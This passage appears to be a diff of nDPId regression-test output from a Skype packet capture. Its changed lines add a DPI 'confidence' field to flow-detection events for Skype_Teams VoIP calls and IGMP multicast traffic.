-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6xIYAAEAR1JLAqAEinTeCmDLdnFYAJvNGe1cC+NCgg6iFX83BbHq4v+mwzzHLJiFQXcBRQbw9"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1431970662914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970662914,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+nlYAAEARkRrAqAEi1cezrDLdnEsAKjxNe1kCd7pyWFY\/2XtrOx7QzlcFNoQgfV3dFZmCGAMb34HK5w=="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431970662914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431970662914,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3jiIAAEAR0y7AqAEiQAQXlzLdnF0AI+cqe1sCynRK6RblWzdW13\/d3OH7SI3y+M61XQ85"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1431970663923,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431970663923,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3FyoAAEARSg7AqAEiQAQXsDLdnEEAI4rRe10CzbovR94s4Zxf8rLQnBsqBqSn7dHSA+Hg"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1431970663923,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970663923,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6rCQAAEAR7PjAqAEinTeClDLdnFMAJgbKe18CYcW5TKiM44ghnCPOJzkfQkjh9HCzfXzFFif7"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1431970663923,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970663923,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8YPIAAEARzyHAqAEinTfrmzLdnFsAKKqoe2ECDwqATU5QUcdDsP2+OoC0sJan4F5erjlhYCY+cbA="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970664361,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1431970664361,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1431970664361,"pkt":"AQBeAAABoPPBbTu2CABGwAAgAAAAAAECgnDAqAD+4AAAAZQEAAARZO6bAAAAAA=="}
-00574{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970664361,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970664361,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970664698,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1431970664698,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"ts_msec":1431970664698,"pkt":"PBXCt3IOtPCr0yf4CABGAAAg8JwAAAECkLLAqAHl4AAA+5QEAAAWAAkE4AAA+wAAAAAAAAAAAAAAAAAA"}
-00576{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970664698,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970664698,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431970664878,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970664878,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/kL8AAEARaq3AqAEib91NmjLdnFEAK0H5e2MCFDnpGlF82iGY4eNpUibWNoDaPXvzzVnf0YiL6zK2YSk="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1431970664878,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431970664878,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5Q+cAAEARHWrAqAEiQAQXlTLdnF4AJXN2e2UCDFA+Qxh89YvJZEs857N5H5uVs05hCuMkyAI="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyYRMAAEARmlXAqAEib91NqzLdnF4AHu9ce2cCLa6FGK\/rw+WZJkTZL2SD2CNvhA=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
